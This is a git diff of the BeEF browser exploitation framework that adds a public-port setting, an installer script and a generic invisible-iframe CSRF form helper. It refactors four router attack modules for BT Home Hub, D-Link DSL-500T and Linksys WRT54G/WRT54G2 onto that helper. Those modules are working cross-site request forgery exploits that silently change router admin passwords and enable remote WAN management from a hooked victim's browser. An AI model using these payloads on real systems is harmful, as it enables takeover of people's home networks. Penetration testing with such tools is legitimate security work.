diff --git a/Rakefile b/Rakefile
index 06b2dc27a..4e736b699 100644
--- a/Rakefile
+++ b/Rakefile
@@ -152,3 +152,23 @@ task :dmg do
puts "\nBeEF.dmg created\n"
end
+
+################################
+# Create CDE Package
+# This will download and make the CDE Executable and
+# gnereate a CDE Package in cde-package
+
+task :cde do
+ puts "\nCloning and Making CDE...";
+ sh "git clone git://github.com/pgbovine/CDE.git";
+ Dir.chdir "CDE";
+ sh "make";
+ Dir.chdir "..";
+ puts "\nCreating CDE Package...\n";
+ sh "./CDE/cde ruby beef";
+ sleep (1);
+ puts "\nCleaning Up...\n";
+ sh "rm -r CDE";
+ puts "\nCDE Package Created...\n";
+ end
+
diff --git a/VERSION b/VERSION
index aafd485c3..509c304b2 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
# limitations under the License.
#
-0.4.3.4-alpha
+0.4.3.5-alpha
diff --git a/config.yaml b/config.yaml
index 2e8b191a9..440ed3479 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
- version: '0.4.3.4-alpha'
+ version: '0.4.3.5-alpha'
debug: false
restrictions:
@@ -32,6 +32,7 @@ beef:
port: "3000"
# if running behind a nat set the public ip address here
#public: ""
+ #public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
hook_file: "/hook.js"
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index c27f3bb2b..387b514bf 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -286,10 +286,37 @@ beef.dom = {
*/
detachApplet: function(id) {
$j('#' + id + '').detach();
+ },
+
+ /**
+ * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
+ * @params: {String} action: the form action attribute, where the request will be sent.
+ * @params: {String} method: HTTP method, usually POST.
+ * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+ * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
+ */
+ createIframeXsrfForm: function(action, method, inputs){
+ var iframeXsrf = beef.dom.createInvisibleIframe();
+
+ var formXsrf = document.createElement('form');
+ formXsrf.setAttribute('action', action);
+ formXsrf.setAttribute('method', method);
+
+ var input = null;
+ for (i in inputs){
+ var attributes = inputs[i];
+ input = document.createElement('input');
+ for(key in attributes){
+ input.setAttribute(key, attributes[key]);
+ }
+ formXsrf.appendChild(input);
+ }
+ iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
+ formXsrf.submit();
+
+ return iframeXsrf;
}
-
-
};
beef.regCmp('beef.dom');
diff --git a/core/main/client/net.js b/core/main/client/net.js
index 7266ae3bc..e0700dcdc 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -136,7 +136,7 @@ beef.net = {
push:function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
- this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+ this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
}
},
@@ -158,8 +158,8 @@ beef.net = {
request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
- if (document.domain == domain) {
- if (document.location.port == "" || document.location.port == null) {
+ if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
+ if(document.location.port == "" || document.location.port == null){
cross_domain = !(port == "80" || port == "443");
}
}
diff --git a/core/main/configuration.rb b/core/main/configuration.rb
index c6d7de06f..f2469e0f4 100644
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -118,7 +118,9 @@ module BeEF
# Load module configurations
def load_modules_config
self.set('beef.module', {})
- Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
+ # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+ module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
+ Dir.glob(module_configs) do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 40d52b825..3621d20e9 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -92,6 +92,7 @@ module Banners
self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
print_success "running on network interface: #{host}"
+ beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index eed479cd6..d43964ff2 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -54,6 +54,17 @@ module Modules
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
+ # @note if http_port <> public_port in config ini, use the public_port
+ unless hook_session_config['beef_public_port'].nil?
+ if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+ hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+ hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+ if hook_session_config['beef_public_port'] == '443'
+ hook_session_config['beef_url'].sub!(/http:/, 'https:')
+ end
+ end
+ end
+
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@body << eruby.evaluate(hook_session_config)
diff --git a/core/main/server.rb b/core/main/server.rb
index 86ae23e74..d15ad9198 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -29,7 +29,8 @@ module BeEF
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- @url = "http://#{beef_host}:#{@configuration.get("beef.http.port")}"
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+ @url = "http://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@command_urls = {}
@mounts = {}
@@ -44,6 +45,8 @@ module BeEF
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
+ 'beef_public' => @configuration.get('beef.http.public'),
+ 'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'),
'beef_hook' => @configuration.get('beef.http.hook_file')
}
diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index 57cc03802..f058afc95 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -15,12 +15,12 @@
- These links are for demonstrating the "collect links" command module
+ These links are for demonstrating the "Get Page HREFs" command module
diff --git a/install-beef b/install-beef
new file mode 100644
index 000000000..2c2401b20
--- /dev/null
+++ b/install-beef
@@ -0,0 +1,147 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+clear
+echo "======================================"
+echo " BeEF Installer "
+echo "======================================"
+echo ""
+echo "Detecting OS..";
+
+
+OS=`uname`
+
+if [ "${OS}" = "Linux" ] ; then
+ if [ -f /etc/redhat-release ] ; then
+ Distro='RedHat'
+ elif [ -f /etc/debian_version ] ; then
+ Distro='Debian'
+ fi
+ readonly OS
+ readonly Distro
+fi
+
+if [ "$OS" == "Darwin" ]; then
+ echo "Mac OSX Detected"
+ echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
+ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+ source ~/.bash_login
+ rvm install 1.9.3-p0 --with-gcc=clang
+ rvm use 1.9.3-p0
+ echo ""
+ echo "Downloading BeEF.."
+
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ echo ""
+ echo "Installing Ruby Gems.."
+ bundle install
+ OK="yes"
+
+ cd beef
+ ./beef
+
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "Please restart Terminal and Run BeEF with:"
+ echo " $ ./beef "
+ echo "=========================================="
+ echo ""
+
+fi
+
+if [ "$Distro" == "Debian" ]; then
+ echo "Debian/Ubuntu Detected"
+ echo "Installing Prerequisite Packages.."
+ sudo apt-get update
+ sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake
+
+ echo "Downloading BeEF.."
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ echo "Installing Ruby Gems"
+ sudo gem install bundler
+ sudo bundle install
+
+ cd beef
+ ./beef
+
+ OK="yes"
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "=========================================="
+ echo ""
+fi
+
+
+if [ "$Distro" == "RedHat" ]; then
+ echo "Redhat/Fedora Detected"
+ echo "Installing Prerequisite Packages.."
+ sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
+
+ echo ""
+ echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.2"
+ wget https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer
+ bash ./rvm-installer
+ source ~/.rvm/scripts/rvm
+ rvm pkg install openssl
+ rvm install 1.9.2 --with-openssl-dir=$rvm_path/usr
+ source ~/.rvm/scripts/rvm
+ rvm use 1.9.2 --default
+
+ echo "Downloading BeEF.."
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ gem install bundler
+ bundle
+
+ source ~/.bash_profile
+
+ cd beef
+ ./beef
+
+ OK="yes"
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "=========================================="
+ echo ""
+
+fi
+
+if [ "$OK" == "yes" ]; then
+
+else
+ echo ""
+ echo "======================================="
+ echo " Install Failed"
+ echo "Unable to locate installer for your OS:"
+ echo $OS
+ echo $Distro
+ echo "======================================="
+ echo ""
+fi
+
+
+
+
+
+
diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb
index e649dbdaa..e4de490dd 100644
--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -24,7 +24,7 @@ class Test_network_request < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- beef_port = @configuration.get("beef.http.port")
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [
{'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
diff --git a/modules/hooked_domain/ajax_fingerprint/config.yaml b/modules/hooked_domain/ajax_fingerprint/config.yaml
index 32e2c3156..b1cd1b6ce 100644
--- a/modules/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/hooked_domain/ajax_fingerprint/config.yaml
@@ -17,8 +17,8 @@ beef:
module:
ajax_fingerprint:
enable: true
- category: "Host"
- name: "Hooked Domain"
+ category: "Hooked Domain"
+ name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb
index 909014fe2..30face23d 100644
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -22,7 +22,7 @@ class Phonegap_persistence < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- beef_port = @configuration.get("beef.http.port")
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [{
'name' => 'hook_url',
diff --git a/modules/router/bt_home_hub_csrf/command.js b/modules/router/bt_home_hub_csrf/command.js
index 1537d8d09..d20374dbe 100644
--- a/modules/router/bt_home_hub_csrf/command.js
+++ b/modules/router/bt_home_hub_csrf/command.js
@@ -17,39 +17,16 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var bt_home_hub_iframe = beef.dom.createInvisibleIframe();
- var form = document.createElement('form');
- form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5");
- form.setAttribute('method', 'post');
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '0');
- input.setAttribute('value', '31');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '1');
- input.setAttribute('value', '');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '30');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- bt_home_hub_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
+ [{'type':'hidden', 'name':'0', 'value':'31'} ,
+ {'type':'hidden', 'name':'1', 'value':''},
+ {'type':'hidden', 'name':'30', 'value':passwd}]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
- delete form;
document.body.removeChild(bt_home_hub_iframe);
}
setTimeout("cleanup()", 15000);
diff --git a/modules/router/dlink_dsl500t_csrf/command.js b/modules/router/dlink_dsl500t_csrf/command.js
index 8616d5acf..ae1c98e23 100644
--- a/modules/router/dlink_dsl500t_csrf/command.js
+++ b/modules/router/dlink_dsl500t_csrf/command.js
@@ -17,48 +17,13 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "/cgi-bin/webcm";
-
- var dsl500t_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'getpage');
- input.setAttribute('value', '../html/tools/usrmgmt.htm');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/username');
- input.setAttribute('value', 'admin');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/password');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/password_confirm');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/idle_timeout');
- input.setAttribute('value', '30');
- form.appendChild(input);
-
- dsl500t_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+ [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
+ {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
+ {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
+ {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
+ {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js
index 036a25aab..0f362bf89 100644
--- a/modules/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/router/linksys_wrt54g2_csrf/command.js
@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "Manage.tri";
-
- var wrt54g2_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_USE_HTTP');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_HTTP');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_HTTP_S');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORDMOD');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORD');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '_http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_WLFILTER');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_REMOTE');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PORT');
- input.setAttribute('value', port);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_UPNP');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'layout');
- input.setAttribute('value', 'en');
- form.appendChild(input);
-
- wrt54g2_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+ [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
+ {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
+ {'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd},
+ {'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd},
+ {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_PORT', 'value':port},
+ {'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'},
+ {'type':'hidden', 'name':'layout', 'value':'en'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js
index 456922d35..d18e65898 100644
--- a/modules/router/linksys_wrt54g_csrf/command.js
+++ b/modules/router/linksys_wrt54g_csrf/command.js
@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "manage.tri";
-
- var wrt54g_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'remote_mgt_https');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'https_enable');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'PasswdModify');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_passwd');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_passwdConfirm');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '_http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'web_wl_filter');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'remote_management');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_wanport');
- input.setAttribute('value', port);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'upnp_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'layout');
- input.setAttribute('value', 'en');
- form.appendChild(input);
-
- wrt54g_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+ [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
+ {'type':'hidden', 'name':'http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'https_enable', 'value':'0'},
+ {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
+ {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+ {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
+ {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'remote_management', 'value':'1'},
+ {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
+ {'type':'hidden', 'name':'http_wanport', 'value':port},
+ {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
+ {'type':'hidden', 'name':'layout', 'value':'en'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");